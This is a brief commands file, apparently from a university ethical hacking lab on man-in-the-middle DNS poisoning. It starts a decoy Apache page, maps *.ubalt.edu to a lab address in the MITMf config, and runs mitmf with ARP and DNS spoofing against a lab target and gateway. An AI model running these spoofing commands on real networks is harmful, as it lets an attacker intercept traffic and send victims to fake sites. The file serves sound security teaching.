Files
Ubalt/EthicalHacking/Labs/MITMAttack/DNS_Poisoning/commands.TXT
2018-12-05 22:03:31 -05:00

9 lines
203 B
Plaintext

echo "my person web page" > /var/www/html/index.html
service apache2 start
leafpad /etc/mitmf/mitmf.conf
*.ubalt.edu=10.0.2.10
mitmf --arp --spoof --gateway 10.0.2.1 --target 10.0.2.15 -i eth0 --dns